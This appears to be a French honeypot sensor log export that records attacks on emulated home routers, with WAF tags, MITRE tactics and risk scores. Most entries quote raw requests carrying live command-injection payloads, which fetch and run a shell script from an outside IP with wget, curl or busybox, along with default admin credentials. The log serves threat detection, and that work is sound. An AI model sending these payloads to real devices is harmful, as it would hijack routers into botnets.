Règles WAF
lfi-12
rce-0
rce-5
ssrf-3
nosqli-3
redir-1
Payload (extrait)
GET /goform/setUsbUnload/.js?deviceName=A;cd%20/tmp%3Bwget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20tenda%3Bbusybox%20wge
Requête brute (extrait)
GET /goform/setUsbUnload/.js?deviceName=A;cd%20/tmp%3Bwget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20tenda%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20tenda%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20tenda HTTP/1.1 Host: 6 |
|||||||
| TCP | 82 · HTTP | http | Traversal LFI lfi path traversal · via HTTP:82 · (tentative d'exploit) · → /wget.sh%20-O-%7Csh%20-s%20dcs%3Bbusybox%20wget… | Élevée | Moyen · 60 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
TA0001
TA0001
TA0002
Protocole
GET /wget.sh%20-O-%7Csh%20-s%20dcs%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20dcs…
Émulateur
HTTP
WAF
53
Recommandation
Investiguer
Tags
Cible HTTP
GET
/wget.sh%20-O-%7Csh%20-s%20dcs%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20dcs%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20dcs
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
82
Chemin / cible
/wget.sh%20-O-%7Csh%20-s%20dcs%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20dcs%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20dcs
Service
HTTP
Pourquoi cette classification : Paramètres de scan · confiance 59%
Confiance classification
59%
Risque capteur
Moyen
· 60
Confiance : Confiance 59 % — 8 tag(s) WAF
Signaux
CRS-930100-sub
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
LFI Double-dot bypass
Ligne de requête
User-Agent
—
Règles WAF
lfi-12
rce-0
rce-5
ssrf-3
nosqli-3
redir-1
webshell-param-cmd
Payload (extrait)
GET /config/?cmd=cd%20/tmp%3Bwget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20dcs%3Bbusybox%20wget%20http://91.92.40.118/wge
Requête brute (extrait)
GET /config/?cmd=cd%20/tmp%3Bwget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20dcs%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20dcs%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20dcs HTTP/1.1 Host: 62.3.50.33:82 Connection: close |
|||||||
| TCP | 82 · HTTP | http | Traversal LFI lfi path traversal · via HTTP:82 · (tentative d'exploit) · → /wget.sh%20-O-%7Csh%20-s%20dhnap2%3Bbusybox%20w… | Élevée | Moyen · 64 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1083
TA0001
TA0002
Protocole
GET /wget.sh%20-O-%7Csh%20-s%20dhnap2%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20…
Émulateur
HTTP
WAF
87
Recommandation
Investiguer
Tags
Cible HTTP
GET
/wget.sh%20-O-%7Csh%20-s%20dhnap2%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20dhnap2%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20dhnap2%60
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
82
Chemin / cible
/wget.sh%20-O-%7Csh%20-s%20dhnap2%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20dhnap2%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20dhna…
Service
HTTP
Pourquoi cette classification : Type « lfi_path_traversal » (signaux protocolaires) · confiance 100%
Confiance classification
100%
Risque capteur
Moyen
· 64
Confiance : Confiance 100 % — 13 tag(s) WAF
Signaux
CRS-930100-sub
Technique MITRE
T1083
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
LFI Double-dot bypass
Probe /HNAP1/
Ligne de requête
User-Agent
—
Règles WAF
lfi-12
rce-0
rce-2
rce-5
ssrf-3
nosqli-3
redir-1
Payload (extrait)
GET /HNAP1/GetDeviceSettings/%60cd%20/tmp%3Bwget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20dhnap2%3Bbusybox%20wget%20http:
Requête brute (extrait)
GET /HNAP1/GetDeviceSettings/%60cd%20/tmp%3Bwget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20dhnap2%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20dhnap2%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20dhnap2%60 HTTP/1.1 Host: 62.3. |
|||||||
| TCP | 82 · HTTP | http | Sonde fichier configuration config file probe · via HTTP:82 · (tentative d'exploit) · → /login.cgi | Élevée | Moyen · 46 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1083
TA0001
TA0002
Protocole
POST /login.cgi
Émulateur
HTTP
WAF
0
Recommandation
Surveiller
Tags
Cible HTTP
POST
/login.cgi
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
82
Chemin / cible
/login.cgi
Service
HTTP
Pourquoi cette classification : Sonde fichier sensible: chemin sensible (tag interne) · Correspondance tags WAF · Sonde fichier sensible / config · confiance 97%
Confiance classification
97%
Risque capteur
Moyen
· 46
Confiance : Confiance 97 % — 4 signal(aux) capteur
Signaux
Http Sensitive
Upstream
Technique MITRE
T1083
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 921130 duplicate CL
Ligne de requête
User-Agent
—
Règles WAF
—
Payload (extrait)
POST /login.cgi HTTP/1.1 Host: 62.3.50.33:82 Content-Type: application/x-www-form-urlencoded Content-Length: 0 Connection: c
Requête brute (extrait)
POST /login.cgi HTTP/1.1 Host: 62.3.50.33:82 Content-Type: application/x-www-form-urlencoded Content-Length: 0 Connection: close |
|||||||
| TCP | 82 · HTTP | http | Injection de commande cmd injection · via HTTP:82 · (tentative d'exploit) · → /apply.cgi | Élevée | Élevé · 81 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1059
TA0001
TA0002
Protocole
POST /apply.cgi
Émulateur
HTTP
WAF
34
Recommandation
Investiguer
Tags
Cible HTTP
POST
/apply.cgi
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
82
Chemin / cible
/apply.cgi
Service
HTTP
Pourquoi cette classification : Injection de commande (tag lfi-12) · Injection commande dans la requête · confiance 100%
Confiance classification
100%
Risque capteur
Élevé
· 81
Confiance : Confiance 100 % — Preuve dans le payload · Motif catalogue confirmé
Signaux
Http Cmdi
pat-0146
Technique MITRE
T1059
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 921130 duplicate CL
Cred Basic auth spray
CRS 932205
Ligne de requête
User-Agent
—
Règles WAF
lfi-12
rce-0
rce-5
ssrf-3
nosqli-3
Payload (extrait)
POST /apply.cgi HTTP/1.1 Host: 62.3.50.33:82 Authorization: Basic YWRtaW46YWRtaW4= Content-Type: application/x-www-form-urlen
Requête brute (extrait)
POST /apply.cgi HTTP/1.1 Host: 62.3.50.33:82 Authorization: Basic YWRtaW46YWRtaW4= Content-Type: application/x-www-form-urlencoded Content-Length: 352 Connection: close submit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_traceroute |
|||||||
| TCP | 82 · HTTP | http | Injection de commande cmd injection · via HTTP:82 · (tentative d'exploit) · → /storage/apply.cgi | Élevée | Élevé · 81 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1059
TA0001
TA0002
Protocole
POST /storage/apply.cgi
Émulateur
HTTP
WAF
40
Recommandation
Investiguer
Tags
Cible HTTP
POST
/storage/apply.cgi
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
82
Chemin / cible
/storage/apply.cgi
Service
HTTP
Pourquoi cette classification : Injection de commande (tag lfi-12) · Injection commande dans la requête · confiance 100%
Confiance classification
100%
Risque capteur
Élevé
· 81
Confiance : Confiance 100 % — Preuve dans le payload · Motif catalogue confirmé
Signaux
Http Cmdi
pat-0146
Technique MITRE
T1059
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 921130 duplicate CL
Cred Basic auth spray
CRS 932205
LFI Double-dot bypass
Ligne de requête
User-Agent
—
Règles WAF
lfi-12
rce-0
rce-5
ssrf-3
nosqli-3
Payload (extrait)
POST /storage/apply.cgi HTTP/1.1 Host: 62.3.50.33:82 Authorization: Basic YWRtaW46YWRtaW4= Content-Type: application/x-www-fo
Requête brute (extrait)
POST /storage/apply.cgi HTTP/1.1 Host: 62.3.50.33:82 Authorization: Basic YWRtaW46YWRtaW4= Content-Type: application/x-www-form-urlencoded Content-Length: 230 Connection: close next_page=/tmp/.s&submit_button=;cd%20/tmp%3Bwget%20http://91.92.40.118 |
|||||||
| TCP | 82 · HTTP | http | Injection de commande cmd injection · via HTTP:82 · (tentative d'exploit) · → /apply.cgi | Élevée | Élevé · 81 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1059
TA0001
TA0002
Protocole
POST /apply.cgi
Émulateur
HTTP
WAF
34
Recommandation
Investiguer
Tags
Cible HTTP
POST
/apply.cgi
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
82
Chemin / cible
/apply.cgi
Service
HTTP
Pourquoi cette classification : Injection de commande (tag lfi-12) · Injection commande dans la requête · confiance 100%
Confiance classification
100%
Risque capteur
Élevé
· 81
Confiance : Confiance 100 % — Preuve dans le payload · Motif catalogue confirmé
Signaux
Http Cmdi
pat-0146
Technique MITRE
T1059
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 921130 duplicate CL
Cred Basic auth spray
CRS 932205
Ligne de requête
User-Agent
—
Règles WAF
lfi-12
rce-0
rce-5
ssrf-3
nosqli-3
Payload (extrait)
POST /apply.cgi HTTP/1.1 Host: 62.3.50.33:82 Authorization: Basic YWRtaW46YWRtaW4= Content-Type: application/x-www-form-urlen
Requête brute (extrait)
POST /apply.cgi HTTP/1.1 Host: 62.3.50.33:82 Authorization: Basic YWRtaW46YWRtaW4= Content-Type: application/x-www-form-urlencoded Content-Length: 255 Connection: close action=Apply&change_action=gozila_cgi&submit_type=&pptp_ip=cd%20/tmp%3Bwget%20h |
|||||||
| TCP | 82 · HTTP | http | Sonde HTTP smuggling http smuggling probe · via HTTP:82 · (tentative d'exploit) · → /apply.cgi | Élevée | Élevé · 79 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
TA0001
TA0001
TA0002
Protocole
POST /apply.cgi
Émulateur
HTTP
WAF
34
Recommandation
Investiguer
Tags
Cible HTTP
POST
/apply.cgi
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
82
Chemin / cible
/apply.cgi
Service
HTTP
Pourquoi cette classification : Motif SSRF · confiance 95%
Confiance classification
95%
Risque capteur
Élevé
· 79
Confiance : Confiance 95 % — Motif catalogue confirmé · 5 tag(s) WAF
Signaux
pat-0842
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 921130 duplicate CL
LFI Double-dot bypass
Ligne de requête
User-Agent
—
Règles WAF
lfi-12
rce-0
rce-5
ssrf-3
nosqli-3
Payload (extrait)
POST /apply.cgi HTTP/1.1 Host: 62.3.50.33:82 Content-Type: application/x-www-form-urlencoded Content-Length: 243 Connection:
Requête brute (extrait)
POST /apply.cgi HTTP/1.1 Host: 62.3.50.33:82 Content-Type: application/x-www-form-urlencoded Content-Length: 243 Connection: close wl_ssid=cd%20/tmp%3Bwget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20lwizard%3Bbusybox%20wget%20http://91.92.40.11 |
|||||||
| TCP | 82 · HTTP | http | Injection de commande cmd injection · via HTTP:82 · (tentative d'exploit) · → /JNAP/ | Élevée | Élevé · 81 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1059
TA0001
TA0002
Protocole
POST /JNAP/
Émulateur
HTTP
WAF
66
Recommandation
Investiguer
Tags
Cible HTTP
POST
/JNAP/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
82
Chemin / cible
/JNAP/
Service
HTTP
Pourquoi cette classification : Injection de commande (tag lfi-12) · Injection commande dans la requête · confiance 100%
Confiance classification
100%
Risque capteur
Élevé
· 81
Confiance : Confiance 100 % — Preuve dans le payload · Motif catalogue confirmé
Signaux
Http Cmdi
pat-0146
Technique MITRE
T1059
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 921130 duplicate CL
CRS 932205
LFI Double-dot bypass
Ligne de requête
User-Agent
—
Règles WAF
lfi-12
rce-0
rce-2
rce-5
ssrf-3
nosqli-3
Payload (extrait)
POST /JNAP/ HTTP/1.1 Host: 62.3.50.33:82 Content-Type: application/json; charset=utf-8 X-JNAP-Action: http://linksys.com/jnap
Requête brute (extrait)
POST /JNAP/ HTTP/1.1 Host: 62.3.50.33:82 Content-Type: application/json; charset=utf-8 X-JNAP-Action: http://linksys.com/jnap/setup/SetupWizard Content-Length: 236 Connection: close {"JNAP":{"action":"http://linksys.com/jnap/setup/SetupWizard","com
|
|||||||
| TCP | 82 · HTTP | http | Injection de commande cmd injection · via HTTP:82 · (tentative d'exploit) · → /JNAP/ | Élevée | Élevé · 81 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1059
TA0001
TA0002
Protocole
POST /JNAP/
Émulateur
HTTP
WAF
72
Recommandation
Investiguer
Tags
Cible HTTP
POST
/JNAP/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
82
Chemin / cible
/JNAP/
Service
HTTP
Pourquoi cette classification : Injection de commande (tag lfi-12) · Injection commande dans la requête · confiance 100%
Confiance classification
100%
Risque capteur
Élevé
· 81
Confiance : Confiance 100 % — Preuve dans le payload · Motif catalogue confirmé
Signaux
Http Cmdi
pat-0146
Technique MITRE
T1059
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 921130 duplicate CL
CRS 932205
LFI Double-dot bypass
Ligne de requête
User-Agent
—
Règles WAF
lfi-12
rce-0
rce-2
rce-5
ssrf-2
ssrf-3
nosqli-3
Payload (extrait)
POST /JNAP/ HTTP/1.1 Host: 62.3.50.33:82 Content-Type: application/json; charset=utf-8 X-JNAP-Action: http://linksys.com/jnap
Requête brute (extrait)
POST /JNAP/ HTTP/1.1 Host: 62.3.50.33:82 Content-Type: application/json; charset=utf-8 X-JNAP-Action: http://linksys.com/jnap/network/Diagnostics Content-Length: 269 Connection: close {"JNAP":{"action":"http://linksys.com/jnap/network/Diagnostics",
|
|||||||
| TCP | 82 · HTTP | http | Sonde HTTP smuggling http smuggling probe · via HTTP:82 · (tentative d'exploit) · → /hndUnblock.cgi | Élevée | Élevé · 79 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
TA0001
TA0001
TA0002
Protocole
POST /hndUnblock.cgi
Émulateur
HTTP
WAF
41
Recommandation
Investiguer
Tags
Cible HTTP
POST
/hndUnblock.cgi
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
82
Chemin / cible
/hndUnblock.cgi
Service
HTTP
Pourquoi cette classification : Motif SSRF · confiance 95%
Confiance classification
95%
Risque capteur
Élevé
· 79
Confiance : Confiance 95 % — Motif catalogue confirmé · 6 tag(s) WAF
Signaux
pat-0842
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 921130 duplicate CL
LFI Double-dot bypass
Ligne de requête
User-Agent
—
Règles WAF
lfi-12
rce-0
rce-2
rce-5
ssrf-3
nosqli-3
Payload (extrait)
POST /hndUnblock.cgi HTTP/1.1 Host: 62.3.50.33:82 Content-Type: application/x-www-form-urlencoded Content-Length: 299 Connec
Requête brute (extrait)
POST /hndUnblock.cgi HTTP/1.1 Host: 62.3.50.33:82 Content-Type: application/x-www-form-urlencoded Content-Length: 299 Connection: close ttcp_ip=-h%20%60cd%20/tmp%3Bwget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20lunblk%3Bbusybox%20wget%20http:/ |
|||||||
| TCP | 82 · HTTP | http | Traversal LFI lfi path traversal · via HTTP:82 · (tentative d'exploit) · → /wget.sh%20-O-%7Csh%20-s%20lhablk%3Bbusybox%20w… | Élevée | Moyen · 60 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
TA0001
TA0001
TA0002
Protocole
GET /wget.sh%20-O-%7Csh%20-s%20lhablk%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20…
Émulateur
HTTP
WAF
48
Recommandation
Investiguer
Tags
Cible HTTP
GET
/wget.sh%20-O-%7Csh%20-s%20lhablk%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20lhablk%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20lhablk%60
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
82
Chemin / cible
/wget.sh%20-O-%7Csh%20-s%20lhablk%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20lhablk%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20lhab…
Service
HTTP
Pourquoi cette classification : Type « lfi_path_traversal » (signaux protocolaires) · confiance 59%
Confiance classification
59%
Risque capteur
Moyen
· 60
Confiance : Confiance 59 % — 7 tag(s) WAF
Signaux
CRS-930100-sub
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
LFI Double-dot bypass
Ligne de requête
User-Agent
—
Règles WAF
lfi-12
rce-0
rce-2
rce-5
ssrf-3
nosqli-3
redir-1
Payload (extrait)
GET /hndUnblock.cgi?ttcp_ip=-h%20%60cd%20/tmp%3Bwget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20lhablk%3Bbusybox%20wget%20h
Requête brute (extrait)
GET /hndUnblock.cgi?ttcp_ip=-h%20%60cd%20/tmp%3Bwget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20lhablk%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20lhablk%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20lhablk%60 HTTP/1.1 Host: 6 |
|||||||
| TCP | 82 · HTTP | http | Traversal LFI lfi path traversal · via HTTP:82 · (tentative d'exploit) · → /wget.sh%20-O-%7Csh%20-s%20lublk%3Bbusybox%20wg… | Élevée | Moyen · 60 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
TA0001
TA0001
TA0002
Protocole
GET /wget.sh%20-O-%7Csh%20-s%20lublk%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20l…
Émulateur
HTTP
WAF
48
Recommandation
Investiguer
Tags
Cible HTTP
GET
/wget.sh%20-O-%7Csh%20-s%20lublk%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20lublk%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20lublk%60
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
82
Chemin / cible
/wget.sh%20-O-%7Csh%20-s%20lublk%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20lublk%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20lublk%…
Service
HTTP
Pourquoi cette classification : Type « lfi_path_traversal » (signaux protocolaires) · confiance 59%
Confiance classification
59%
Risque capteur
Moyen
· 60
Confiance : Confiance 59 % — 7 tag(s) WAF
Signaux
CRS-930100-sub
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
LFI Double-dot bypass
Ligne de requête
User-Agent
—
Règles WAF
lfi-12
rce-0
rce-2
rce-5
ssrf-3
nosqli-3
redir-1
Payload (extrait)
GET /tmUnblock.cgi?ttcp_ip=-h%20%60cd%20/tmp%3Bwget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20lublk%3Bbusybox%20wget%20htt
Requête brute (extrait)
GET /tmUnblock.cgi?ttcp_ip=-h%20%60cd%20/tmp%3Bwget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20lublk%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20lublk%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20lublk%60 HTTP/1.1 Host: 62.3. |
|||||||
| TCP | 82 · HTTP | http | Injection de commande cmd injection · via HTTP:82 · (tentative d'exploit) · → /tmUnblock.cgi | Élevée | Élevé · 81 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1059
TA0001
TA0002
Protocole
POST /tmUnblock.cgi
Émulateur
HTTP
WAF
41
Recommandation
Investiguer
Tags
Cible HTTP
POST
/tmUnblock.cgi
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
82
Chemin / cible
/tmUnblock.cgi
Service
HTTP
Pourquoi cette classification : Injection de commande (tag lfi-12) · Injection commande dans la requête · confiance 100%
Confiance classification
100%
Risque capteur
Élevé
· 81
Confiance : Confiance 100 % — Preuve dans le payload · Motif catalogue confirmé
Signaux
Http Cmdi
pat-0146
Technique MITRE
T1059
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 921130 duplicate CL
CRS 932205
LFI Double-dot bypass
Ligne de requête
User-Agent
—
Règles WAF
lfi-12
rce-0
rce-2
rce-5
ssrf-3
nosqli-3
Payload (extrait)
POST /tmUnblock.cgi HTTP/1.1 Host: 62.3.50.33:82 Content-Type: application/x-www-form-urlencoded Content-Length: 242 Connect
Requête brute (extrait)
POST /tmUnblock.cgi HTTP/1.1 Host: 62.3.50.33:82 Content-Type: application/x-www-form-urlencoded Content-Length: 242 Connection: close ttcp_num=3&ttcp_size=3&ttcp_ip=-h+%60cd%20/tmp%3Bwget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20lunblkv%3Bbu |
|||||||
| TCP | 82 · HTTP | http | Sonde HTTP Sonde HTTP · via HTTP:82 · (sonde / probe) | Élevée | Moyen · 40 |
|
|
|
Étape
Sonde / probe
Chaîne
Découverte
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
TA0007
TA0007
TA0001
Protocole
GET /
Émulateur
HTTP
WAF
3
Recommandation
Surveiller
Tags
Cible HTTP
GET
/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
82
Chemin / cible
/
Service
HTTP
Pourquoi cette classification : Sonde HTTP (tag sap-sapcontrol-path) · confiance 77%
Confiance classification
77%
Risque capteur
Moyen
· 40
Confiance : Confiance 77 % — Score WAF 20 · 1 tag(s) WAF
Technique MITRE
TA0007
Tactiques MITRE
TA0007
TA0001
Ligne de requête
User-Agent
—
Règles WAF
sap-sapcontrol-path
Payload (extrait)
GET / HTTP/1.1 Host: 62.3.50.33:82 Authorization: Basic YWRtaW46YWRtaW4= Connection: close |
|||||||
| TCP | 82 · HTTP | http | Injection de commande cmd injection · via HTTP:82 · (tentative d'exploit) · → /apply.cgi | Élevée | Élevé · 81 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1059
TA0001
TA0002
Protocole
POST /apply.cgi
Émulateur
HTTP
WAF
34
Recommandation
Investiguer
Tags
Cible HTTP
POST
/apply.cgi
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
82
Chemin / cible
/apply.cgi
Service
HTTP
Pourquoi cette classification : Injection de commande (tag lfi-12) · Injection commande dans la requête · confiance 100%
Confiance classification
100%
Risque capteur
Élevé
· 81
Confiance : Confiance 100 % — Preuve dans le payload · Motif catalogue confirmé
Signaux
Http Cmdi
pat-0146
Technique MITRE
T1059
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 921130 duplicate CL
Cred Basic auth spray
CRS 932205
Ligne de requête
User-Agent
—
Règles WAF
lfi-12
rce-0
rce-5
ssrf-3
nosqli-3
Payload (extrait)
POST /apply.cgi HTTP/1.1 Host: 62.3.50.33:82 Authorization: Basic YWRtaW46YWRtaW4= Content-Type: application/x-www-form-urlen
Requête brute (extrait)
POST /apply.cgi HTTP/1.1 Host: 62.3.50.33:82 Authorization: Basic YWRtaW46YWRtaW4= Content-Type: application/x-www-form-urlencoded Content-Length: 350 Connection: close submit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping&actio |
|||||||
| TCP | 82 · HTTP | http | Injection de commande cmd injection · via HTTP:82 · (tentative d'exploit) · → /apply.cgi | Élevée | Élevé · 81 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1059
TA0001
TA0002
Protocole
POST /apply.cgi
Émulateur
HTTP
WAF
34
Recommandation
Investiguer
Tags
Cible HTTP
POST
/apply.cgi
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
82
Chemin / cible
/apply.cgi
Service
HTTP
Pourquoi cette classification : Injection de commande (tag lfi-12) · Injection commande dans la requête · confiance 100%
Confiance classification
100%
Risque capteur
Élevé
· 81
Confiance : Confiance 100 % — Preuve dans le payload · Motif catalogue confirmé
Signaux
Http Cmdi
pat-0146
Technique MITRE
T1059
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 921130 duplicate CL
Cred Basic auth spray
CRS 932205
Ligne de requête
User-Agent
—
Règles WAF
lfi-12
rce-0
rce-5
ssrf-3
nosqli-3
Payload (extrait)
POST /apply.cgi HTTP/1.1 Host: 62.3.50.33:82 Authorization: Basic YWRtaW46YWRtaW4= Content-Type: application/x-www-form-urlen
Requête brute (extrait)
POST /apply.cgi HTTP/1.1 Host: 62.3.50.33:82 Authorization: Basic YWRtaW46YWRtaW4= Content-Type: application/x-www-form-urlencoded Content-Length: 334 Connection: close change_action=&submit_button=Basic&action=&commit=0&wan_ip=10.0.0.1&wan_mask=25 |
|||||||
| TCP | 82 · HTTP | http | Injection de commande cmd injection · via HTTP:82 · (tentative d'exploit) · → /tmUnblock.cgi | Élevée | Élevé · 81 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1059
TA0001
TA0002
Protocole
POST /tmUnblock.cgi
Émulateur
HTTP
WAF
41
Recommandation
Investiguer
Tags
Cible HTTP
POST
/tmUnblock.cgi
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
82
Chemin / cible
/tmUnblock.cgi
Service
HTTP
Pourquoi cette classification : Injection de commande (tag lfi-12) · Injection commande dans la requête · confiance 100%
Confiance classification
100%
Risque capteur
Élevé
· 81
Confiance : Confiance 100 % — Preuve dans le payload · Motif catalogue confirmé
Signaux
Http Cmdi
pat-0146
Technique MITRE
T1059
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 921130 duplicate CL
CRS 932205
LFI Double-dot bypass
Ligne de requête
User-Agent
—
Règles WAF
lfi-12
rce-0
rce-2
rce-5
ssrf-3
nosqli-3
Payload (extrait)
POST /tmUnblock.cgi HTTP/1.1 Host: 62.3.50.33:82 Content-Type: application/x-www-form-urlencoded Content-Length: 294 Connect
Requête brute (extrait)
POST /tmUnblock.cgi HTTP/1.1 Host: 62.3.50.33:82 Content-Type: application/x-www-form-urlencoded Content-Length: 294 Connection: close submit_button=&change_action=&action=&commit=0&ttcp_num=2&ttcp_size=2&ttcp_ip=-h+%60cd%20/tmp%3Bwget%20http://91.9 |
|||||||